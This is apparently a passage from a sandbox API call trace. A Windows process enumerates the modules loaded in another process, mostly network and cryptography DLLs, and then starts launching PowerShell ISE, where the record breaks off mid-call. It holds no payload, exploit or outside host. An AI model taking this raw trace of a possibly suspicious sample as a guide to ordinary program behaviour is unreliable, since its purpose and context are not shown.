[0146.145] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0146.145] CoTaskMemFree (pv=0x55b780) [0146.145] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.145] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0146.146] CoTaskMemFree (pv=0x55b780) [0146.146] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x24312e4, cb=0xc | out: lpmodinfo=0x24312e4*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0146.147] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.147] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0146.148] CoTaskMemFree (pv=0x55b780) [0146.148] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.148] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0146.149] CoTaskMemFree (pv=0x55b780) [0146.149] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x24333f8, cb=0xc | out: lpmodinfo=0x24333f8*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0146.149] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.149] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0146.185] CoTaskMemFree (pv=0x55b780) [0146.185] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.185] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0146.186] CoTaskMemFree (pv=0x55b780) [0146.186] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x2435504, cb=0xc | out: lpmodinfo=0x2435504*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0146.187] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.187] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0146.188] CoTaskMemFree (pv=0x55b780) [0146.188] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.188] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0146.189] CoTaskMemFree (pv=0x55b780) [0146.189] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x2437610, cb=0xc | out: lpmodinfo=0x2437610*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0146.189] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.189] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0146.190] CoTaskMemFree (pv=0x55b780) [0146.190] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.190] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0146.191] CoTaskMemFree (pv=0x55b780) [0146.191] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x243971c, cb=0xc | out: lpmodinfo=0x243971c*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0146.192] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.192] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0146.193] CoTaskMemFree (pv=0x55b780) [0146.193] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.193] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0146.194] CoTaskMemFree (pv=0x55b780) [0146.194] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x243b828, cb=0xc | out: lpmodinfo=0x243b828*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0146.195] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.195] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0146.196] CoTaskMemFree (pv=0x55b780) [0146.196] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.196] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0146.196] CoTaskMemFree (pv=0x55b780) [0146.197] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x243d934, cb=0xc | out: lpmodinfo=0x243d934*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0146.198] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.198] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0146.199] CoTaskMemFree (pv=0x55b780) [0146.199] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.199] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0146.200] CoTaskMemFree (pv=0x55b780) [0146.200] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x243fa80, cb=0xc | out: lpmodinfo=0x243fa80*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0146.200] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.201] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="IPHLPAPI.DLL") returned 0xc [0146.201] CoTaskMemFree (pv=0x55b780) [0146.201] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.201] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x714f0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll")) returned 0x20 [0146.202] CoTaskMemFree (pv=0x55b780) [0146.202] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76900000, lpmodinfo=0x2441b94, cb=0xc | out: lpmodinfo=0x2441b94*(lpBaseOfDll=0x76900000, SizeOfImage=0x7000, EntryPoint=0x76901e10)) returned 1 [0146.203] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.203] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76900000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="NSI.dll") returned 0x7 [0146.204] CoTaskMemFree (pv=0x55b780) [0146.204] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.204] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76900000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NSI.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll")) returned 0x1b [0146.205] CoTaskMemFree (pv=0x55b780) [0146.205] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a860000, lpmodinfo=0x2443c90, cb=0xc | out: lpmodinfo=0x2443c90*(lpBaseOfDll=0x6a860000, SizeOfImage=0x13000, EntryPoint=0x6a8625d0)) returned 1 [0146.206] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.206] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a860000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="dhcpcsvc6.DLL") returned 0xd [0146.207] CoTaskMemFree (pv=0x55b780) [0146.207] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.207] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a860000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc6.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll")) returned 0x21 [0146.208] CoTaskMemFree (pv=0x55b780) [0146.208] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a840000, lpmodinfo=0x2445da4, cb=0xc | out: lpmodinfo=0x2445da4*(lpBaseOfDll=0x6a840000, SizeOfImage=0x14000, EntryPoint=0x6a843c10)) returned 1 [0146.209] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.209] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a840000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="dhcpcsvc.DLL") returned 0xc [0146.210] CoTaskMemFree (pv=0x55b780) [0146.210] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.210] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a840000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\dhcpcsvc.DLL" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll")) returned 0x20 [0146.211] CoTaskMemFree (pv=0x55b780) [0146.211] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74eb0000, lpmodinfo=0x2447eb8, cb=0xc | out: lpmodinfo=0x2447eb8*(lpBaseOfDll=0x74eb0000, SizeOfImage=0x13ff000, EntryPoint=0x7506b990)) returned 1 [0146.212] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.212] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74eb0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="shell32.dll") returned 0xb [0146.213] CoTaskMemFree (pv=0x55b780) [0146.213] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.213] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74eb0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0146.214] CoTaskMemFree (pv=0x55b780) [0146.214] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76800000, lpmodinfo=0x2449fc4, cb=0xc | out: lpmodinfo=0x2449fc4*(lpBaseOfDll=0x76800000, SizeOfImage=0x37000, EntryPoint=0x76803b50)) returned 1 [0146.215] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.215] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76800000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="cfgmgr32.dll") returned 0xc [0146.216] CoTaskMemFree (pv=0x55b780) [0146.216] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.216] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76800000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")) returned 0x20 [0146.217] CoTaskMemFree (pv=0x55b780) [0146.217] GetModuleInformation (in: hProcess=0x2a0, hModule=0x745b0000, lpmodinfo=0x244c0d8, cb=0xc | out: lpmodinfo=0x244c0d8*(lpBaseOfDll=0x745b0000, SizeOfImage=0x4f9000, EntryPoint=0x747b7610)) returned 1 [0146.219] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.219] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x745b0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="windows.storage.dll") returned 0x13 [0146.220] CoTaskMemFree (pv=0x55b780) [0146.220] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.220] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x745b0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")) returned 0x27 [0146.221] CoTaskMemFree (pv=0x55b780) [0146.221] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74520000, lpmodinfo=0x244e204, cb=0xc | out: lpmodinfo=0x244e204*(lpBaseOfDll=0x74520000, SizeOfImage=0x8d000, EntryPoint=0x74569b90)) returned 1 [0146.222] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.222] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74520000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="shcore.dll") returned 0xa [0146.223] CoTaskMemFree (pv=0x55b780) [0146.223] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.223] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74520000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\shcore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")) returned 0x1e [0146.224] CoTaskMemFree (pv=0x55b780) [0146.224] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76470000, lpmodinfo=0x2450310, cb=0xc | out: lpmodinfo=0x2450310*(lpBaseOfDll=0x76470000, SizeOfImage=0x44000, EntryPoint=0x76477410)) returned 1 [0146.225] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.225] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76470000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="powrprof.dll") returned 0xc [0146.226] CoTaskMemFree (pv=0x55b780) [0146.226] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.226] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76470000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")) returned 0x20 [0146.228] CoTaskMemFree (pv=0x55b780) [0146.228] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f20000, lpmodinfo=0x2452424, cb=0xc | out: lpmodinfo=0x2452424*(lpBaseOfDll=0x73f20000, SizeOfImage=0xf000, EntryPoint=0x73f22e40)) returned 1 [0146.235] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.235] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f20000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="profapi.dll") returned 0xb [0146.236] CoTaskMemFree (pv=0x55b780) [0146.236] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.236] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f20000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")) returned 0x1f [0146.238] CoTaskMemFree (pv=0x55b780) [0146.238] GetModuleInformation (in: hProcess=0x2a0, hModule=0x70a50000, lpmodinfo=0x2454530, cb=0xc | out: lpmodinfo=0x2454530*(lpBaseOfDll=0x70a50000, SizeOfImage=0x84000, EntryPoint=0x70a76530)) returned 1 [0146.239] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.239] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x70a50000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="DNSAPI.dll") returned 0xa [0146.240] CoTaskMemFree (pv=0x55b780) [0146.240] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.240] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x70a50000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\DNSAPI.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll")) returned 0x1e [0146.242] CoTaskMemFree (pv=0x55b780) [0146.242] GetModuleInformation (in: hProcess=0x2a0, hModule=0x713f0000, lpmodinfo=0x245663c, cb=0xc | out: lpmodinfo=0x245663c*(lpBaseOfDll=0x713f0000, SizeOfImage=0x8000, EntryPoint=0x713f1fc0)) returned 1 [0146.243] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.243] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x713f0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="WINNSI.DLL") returned 0xa [0146.245] CoTaskMemFree (pv=0x55b780) [0146.245] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.245] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x713f0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\WINNSI.DLL" (normalized: "c:\\windows\\syswow64\\winnsi.dll")) returned 0x1e [0146.246] CoTaskMemFree (pv=0x55b780) [0146.246] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fa30000, lpmodinfo=0x2458748, cb=0xc | out: lpmodinfo=0x2458748*(lpBaseOfDll=0x6fa30000, SizeOfImage=0x8000, EntryPoint=0x6fa31920)) returned 1 [0146.247] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.247] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fa30000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="rasadhlp.dll") returned 0xc [0146.248] CoTaskMemFree (pv=0x55b780) [0146.248] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.249] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fa30000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\syswow64\\rasadhlp.dll")) returned 0x20 [0146.250] CoTaskMemFree (pv=0x55b780) [0146.250] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f9e0000, lpmodinfo=0x245a85c, cb=0xc | out: lpmodinfo=0x245a85c*(lpBaseOfDll=0x6f9e0000, SizeOfImage=0x47000, EntryPoint=0x6f9f58d0)) returned 1 [0146.251] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.251] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="fwpuclnt.dll") returned 0xc [0146.253] CoTaskMemFree (pv=0x55b780) [0146.253] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.253] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f9e0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\fwpuclnt.dll" (normalized: "c:\\windows\\syswow64\\fwpuclnt.dll")) returned 0x20 [0146.254] CoTaskMemFree (pv=0x55b780) [0146.254] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71540000, lpmodinfo=0x245c970, cb=0xc | out: lpmodinfo=0x245c970*(lpBaseOfDll=0x71540000, SizeOfImage=0x1b000, EntryPoint=0x71549050)) returned 1 [0146.255] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.255] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71540000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="bcrypt.dll") returned 0xa [0146.257] CoTaskMemFree (pv=0x55b780) [0146.257] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.257] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71540000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")) returned 0x1e [0146.258] CoTaskMemFree (pv=0x55b780) [0146.258] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6fdf0000, lpmodinfo=0x245ea7c, cb=0xc | out: lpmodinfo=0x245ea7c*(lpBaseOfDll=0x6fdf0000, SizeOfImage=0xa000, EntryPoint=0x6fdf3200)) returned 1 [0146.260] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.260] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="secur32.dll") returned 0xb [0146.261] CoTaskMemFree (pv=0x55b780) [0146.261] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.261] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6fdf0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll")) returned 0x1f [0146.262] CoTaskMemFree (pv=0x55b780) [0146.262] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f970000, lpmodinfo=0x2460b88, cb=0xc | out: lpmodinfo=0x2460b88*(lpBaseOfDll=0x6f970000, SizeOfImage=0x64000, EntryPoint=0x6f98afd0)) returned 1 [0146.263] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.263] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f970000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="schannel.dll") returned 0xc [0146.265] CoTaskMemFree (pv=0x55b780) [0146.265] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.265] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f970000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\schannel.dll" (normalized: "c:\\windows\\syswow64\\schannel.dll")) returned 0x20 [0146.266] CoTaskMemFree (pv=0x55b780) [0146.266] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f90000, lpmodinfo=0x2462c9c, cb=0xc | out: lpmodinfo=0x2462c9c*(lpBaseOfDll=0x73f90000, SizeOfImage=0x178000, EntryPoint=0x73fe8a90)) returned 1 [0146.267] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.267] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f90000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="CRYPT32.dll") returned 0xb [0146.269] CoTaskMemFree (pv=0x55b780) [0146.269] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.269] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f90000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\CRYPT32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll")) returned 0x1f [0146.270] CoTaskMemFree (pv=0x55b780) [0146.270] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764c0000, lpmodinfo=0x2464da8, cb=0xc | out: lpmodinfo=0x2464da8*(lpBaseOfDll=0x764c0000, SizeOfImage=0xe000, EntryPoint=0x764c5410)) returned 1 [0146.271] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.271] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764c0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="MSASN1.dll") returned 0xa [0146.273] CoTaskMemFree (pv=0x55b780) [0146.273] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.273] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764c0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSASN1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll")) returned 0x1e [0146.274] CoTaskMemFree (pv=0x55b780) [0146.274] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f960000, lpmodinfo=0x2466eb4, cb=0xc | out: lpmodinfo=0x2466eb4*(lpBaseOfDll=0x6f960000, SizeOfImage=0x10000, EntryPoint=0x6f964600)) returned 1 [0146.293] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.293] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f960000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="mskeyprotect.dll") returned 0x10 [0146.294] CoTaskMemFree (pv=0x55b780) [0146.294] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.294] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f960000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\mskeyprotect.dll" (normalized: "c:\\windows\\syswow64\\mskeyprotect.dll")) returned 0x24 [0146.296] CoTaskMemFree (pv=0x55b780) [0146.296] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f940000, lpmodinfo=0x24691e4, cb=0xc | out: lpmodinfo=0x24691e4*(lpBaseOfDll=0x6f940000, SizeOfImage=0x20000, EntryPoint=0x6f94d120)) returned 1 [0146.297] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.297] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f940000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="ncrypt.dll") returned 0xa [0146.298] CoTaskMemFree (pv=0x55b780) [0146.298] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.298] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f940000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ncrypt.dll" (normalized: "c:\\windows\\syswow64\\ncrypt.dll")) returned 0x1e [0146.300] CoTaskMemFree (pv=0x55b780) [0146.300] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f910000, lpmodinfo=0x246b2f0, cb=0xc | out: lpmodinfo=0x246b2f0*(lpBaseOfDll=0x6f910000, SizeOfImage=0x2c000, EntryPoint=0x6f92bb10)) returned 1 [0146.301] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.301] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f910000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="NTASN1.dll") returned 0xa [0146.302] CoTaskMemFree (pv=0x55b780) [0146.302] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.303] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f910000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\NTASN1.dll" (normalized: "c:\\windows\\syswow64\\ntasn1.dll")) returned 0x1e [0146.304] CoTaskMemFree (pv=0x55b780) [0146.304] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f8f0000, lpmodinfo=0x246d3fc, cb=0xc | out: lpmodinfo=0x246d3fc*(lpBaseOfDll=0x6f8f0000, SizeOfImage=0x1a000, EntryPoint=0x6f8ffa70)) returned 1 [0146.306] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.306] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpBaseName=0x55b780, nSize=0x800 | out: lpBaseName="ncryptsslp.dll") returned 0xe [0146.308] CoTaskMemFree (pv=0x55b780) [0146.308] CoTaskMemAlloc (cb=0x804) returned 0x55b780 [0146.308] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f8f0000, lpFilename=0x55b780, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\ncryptsslp.dll" (normalized: "c:\\windows\\syswow64\\ncryptsslp.dll")) returned 0x22 [0146.309] CoTaskMemFree (pv=0x55b780) [0146.309] CloseHandle (hObject=0x2a0) returned 1 [0146.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", cchWideChar=61, lpMultiByteStr=0x19e5b0, cbMultiByte=63, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe\x88\x80\x04úKÍ/(ú7i\x80ò\x19", lpUsedDefaultChar=0x0) returned 61 [0146.329] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe\"", cchWideChar=63, lpMultiByteStr=0x19e56c, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe\"", lpUsedDefaultChar=0x0) returned 63 [0146.333] CreateProcessA (in: 